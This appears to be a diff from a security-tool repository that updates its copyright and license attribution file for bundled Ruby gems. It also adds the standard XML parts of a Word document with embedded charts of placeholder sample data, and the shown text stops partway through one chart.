-Files: lib/gemcache/ruby/1.9.1/gems/rack-cache-*/*
-Copyright: 2008 Ryan Tomayko <http://tomayko.com/about>
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-ssl-*/*
-Copyright: 2010 Joshua Peek
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rack-test-*/*
-Copyright: 2008-2009 Bryan Helmkamp, Engine Yard Inc.
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/railties-*/*
-Copyright: No copyright statement provided
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/rake-*/*
-Copyright: 2003, 2004 Jim Weirich
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/robots-*/*
-Copyright: 2008 Kyle Maxwell, contributors
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/slop-*/*
-Copyright: 2012 Lee Jarvis
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/spork-*/*
-Copyright: 2009 Tim Harper
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/sprockets-*/*
-Copyright: 2011 Sam Stephenson, Joshua Peek
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/state_machine-*/*
-Copyright: 2006-2012 Aaron Pfeifer
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/thor-*/*
-Copyright: 2008 Yehuda Katz
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/tilt-*/*
-Copyright: 2010 Ryan Tomayko <http://tomayko.com/about>
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/treetop-*/*
-Copyright: 2007 Nathan Sobo
-License: MIT
-
-Files: lib/gemcache/ruby/1.9.1/gems/tzinfo-*/*
-Copyright: 2005-2006 Philip Ross
-License: MIT
-
 Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
 Copyright: 2006-2010 Yoann GUILLOT
 License: LGPL-2.1
@@ -454,6 +147,127 @@ Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 License: BSD-3-clause

+#
+# Gems
+#
+
+Files: activemodel
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activerecord
+Copyright: 2004-2011 David Heinemeier Hansson
+License: MIT
+
+Files: activesupport
+Copyright: 2005-2011 David Heinemeier Hansson
+License: MIT
+
+Files: arel
+Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
+License: MIT
+
+Files: builder
+Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com)
+License: MIT
+
+Files: database_cleaner
+Copyright: 2009 Ben Mabey
+License: MIT
+
+Files: diff-lcs
+Copyright: 2004-2011 Austin Ziegler
+License: MIT
+
+Files: factory_girl
+Copyright: 2008-2013 Joe Ferris and thoughtbot, inc.
+License: MIT
+
+Files: fivemat
+Copyright: 2012 Tim Pope
+License: MIT
+
+Files: i18n
+Copyright: 2008 The Ruby I18n team
+License: MIT
+
+Files: json
+Copyright: Daniel Luz <dev at mernen dot com>
+License: Ruby
+
+Files: metasploit_data_models
+Copyright: 2012 Rapid7, Inc.
+License: MIT
+
+Files: mini_portile
+Copyright: 2011 Luis Lavena
+License: MIT
+
+Files: msgpack
+Copyright: Austin Ziegler
+License: Ruby
+
+Files: multi_json
+Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
+License: MIT
+
+Files: network_interface
+Copyright: 2012, Rapid7, Inc.
+License: MIT
+
+Files: nokogiri
+Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
+License: MIT
+
+Files: packetfu
+Copyright: 2008-2012 Tod Beardsley
+License: BSD-3-clause
+
+Files: pcaprub
+Copyright: 2007-2008, Alastair Houghton
+License: LGPL-2.1
+
+Files: pg
+Copyright: 1997-2012 by the authors
+License: Ruby
+
+Files: rake
+Copyright: 2003, 2004 Jim Weirich
+License: MIT
+
+Files: redcarpet
+Copyright: 2009 Natacha Porté
+License: MIT
+
+Files: robots
+Copyright: 2008 Kyle Maxwell, contributors
+License: MIT
+
+Files: rspec
+Copyright: 2009 Chad Humphries, David Chelimsky
+License: MIT
+
+Files: shoulda-matchers
+Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc.
+License: MIT
+
+Files: simplecov
+Copyright: 2010-2012 Christoph Olszowka
+License: MIT
+
+Files: timecop
+Copyright: 2012 Travis Jeffery, John Trupiano
+License: MIT
+
+Files: tzinfo
+Copyright: 2005-2006 Philip Ross
+License: MIT
+
+Files: yard
+Copyright: 2007-2013 Loren Segal
+License: MIT
+
+
 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
 are permitted provided that the following conditions are met:
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/>
+<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/>
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
+</Relationships>
@@ -0,0 +1,19 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
+<Template>Normal.dotm</Template>
+<TotalTime>4</TotalTime>
+<Pages>1</Pages>
+<Words>217</Words>
+<Characters>1238</Characters>
+<Application>Microsoft Office Word</Application>
+<DocSecurity>0</DocSecurity>
+<Lines>10</Lines>
+<Paragraphs>2</Paragraphs>
+<ScaleCrop>false</ScaleCrop>
+<Company>home</Company>
+<LinksUpToDate>false</LinksUpToDate>
+<CharactersWithSpaces>1453</CharactersWithSpaces>
+<SharedDoc>false</SharedDoc>
+<HyperlinksChanged>false</HyperlinksChanged>
+<AppVersion>12.0000</AppVersion>
+</Properties>
@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
+<dc:creator>Win7</dc:creator>
+<cp:lastModifiedBy>Win7</cp:lastModifiedBy>
+<cp:revision>1</cp:revision>
+<dcterms:created xsi:type="dcterms:W3CDTF">2013-10-03T22:46:00Z</dcterms:created>
+<dcterms:modified xsi:type="dcterms:W3CDTF">2013-10-03T23:17:00Z</dcterms:modified>
+</cp:coreProperties>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet1.xlsx"/>
+</Relationships>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet2.xlsx"/>
+</Relationships>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet3.xlsx"/>
+</Relationships>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet4.xlsx"/>
+</Relationships>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet5.xlsx"/>
+</Relationships>
@@ -0,0 +1,4 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
+<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/package" Target="../embeddings/Microsoft_Office_Excel_Worksheet6.xlsx"/>
+</Relationships>
@@ -0,0 +1,230 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:bar3DChart>
+<c:barDir val="col"/>
+<c:grouping val="standard"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:shape val="cylinder"/>
+<c:axId val="51657728"/>
+<c:axId val="69190400"/>
+<c:axId val="25292288"/>
+</c:bar3DChart>
+<c:catAx>
+<c:axId val="51657728"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="69190400"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="69190400"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="51657728"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+<c:serAx>
+<c:axId val="25292288"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="69190400"/>
+<c:crosses val="autoZero"/>
+</c:serAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
@@ -0,0 +1,220 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:rAngAx val="1"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:bar3DChart>
+<c:barDir val="col"/>
+<c:grouping val="clustered"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:shape val="pyramid"/>
+<c:axId val="71774208"/>
+<c:axId val="71776128"/>
+<c:axId val="0"/>
+</c:bar3DChart>
+<c:catAx>
+<c:axId val="71774208"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="71776128"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="71776128"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="71774208"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
@@ -0,0 +1,230 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:bar3DChart>
+<c:barDir val="col"/>
+<c:grouping val="standard"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 1</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>4.3</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2.5</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3.5</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>4.5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="1"/>
+<c:order val="1"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$C$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 2</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$C$2:$C$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2.4</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>4.4000000000000004</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.8</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>2.8</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:ser>
+<c:idx val="2"/>
+<c:order val="2"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$D$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Series 3</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Category 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Category 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Category 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Category 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$D$2:$D$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>5</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:shape val="pyramid"/>
+<c:axId val="50252800"/>
+<c:axId val="50255744"/>
+<c:axId val="71870208"/>
+</c:bar3DChart>
+<c:catAx>
+<c:axId val="50252800"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50255744"/>
+<c:crosses val="autoZero"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+<c:valAx>
+<c:axId val="50255744"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50252800"/>
+<c:crosses val="autoZero"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+<c:serAx>
+<c:axId val="71870208"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50255744"/>
+<c:crosses val="autoZero"/>
+</c:serAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
@@ -0,0 +1,110 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:title>
+<c:layout/>
+</c:title>
+<c:view3D>
+<c:rotX val="30"/>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:bar3DChart>
+<c:barDir val="bar"/>
+<c:grouping val="clustered"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
+<c:tx>
+<c:strRef>
+<c:f>Sheet1!$B$1</c:f>
+<c:strCache>
+<c:ptCount val="1"/>
+<c:pt idx="0">
+<c:v>Sales</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:tx>
+<c:cat>
+<c:strRef>
+<c:f>Sheet1!$A$2:$A$5</c:f>
+<c:strCache>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>Sq.. 1</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>Sq.. 2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>Sq.. 3</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>Sq.. 4</c:v>
+</c:pt>
+</c:strCache>
+</c:strRef>
+</c:cat>
+<c:val>
+<c:numRef>
+<c:f>Sheet1!$B$2:$B$5</c:f>
+<c:numCache>
+<c:formatCode>General</c:formatCode>
+<c:ptCount val="4"/>
+<c:pt idx="0">
+<c:v>8.1999999999999993</c:v>
+</c:pt>
+<c:pt idx="1">
+<c:v>3.2</c:v>
+</c:pt>
+<c:pt idx="2">
+<c:v>1.4</c:v>
+</c:pt>
+<c:pt idx="3">
+<c:v>1.2</c:v>
+</c:pt>
+</c:numCache>
+</c:numRef>
+</c:val>
+</c:ser>
+<c:shape val="box"/>
+<c:axId val="50777472"/>
+<c:axId val="50780032"/>
+<c:axId val="0"/>
+</c:bar3DChart>
+<c:valAx>
+<c:axId val="50780032"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="b"/>
+<c:majorGridlines/>
+<c:numFmt formatCode="General" sourceLinked="1"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50777472"/>
+<c:crossBetween val="between"/>
+</c:valAx>
+<c:catAx>
+<c:axId val="50777472"/>
+<c:scaling>
+<c:orientation val="minMax"/>
+</c:scaling>
+<c:axPos val="l"/>
+<c:tickLblPos val="nextTo"/>
+<c:crossAx val="50780032"/>
+<c:auto val="1"/>
+<c:lblAlgn val="ctr"/>
+<c:lblOffset val="100"/>
+</c:catAx>
+</c:plotArea>
+<c:legend>
+<c:legendPos val="r"/>
+<c:layout/>
+</c:legend>
+<c:plotVisOnly val="1"/>
+</c:chart>
+<c:externalData r:id="rId1"/>
+</c:chartSpace>
@@ -0,0 +1,228 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
+<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
+<c:lang val="en-US"/>
+<c:chart>
+<c:view3D>
+<c:perspective val="30"/>
+</c:view3D>
+<c:plotArea>
+<c:layout/>
+<c:line3DChart>
+<c:grouping val="standard"/>
+<c:ser>
+<c:idx val="0"/>
+<c:order val="0"/>
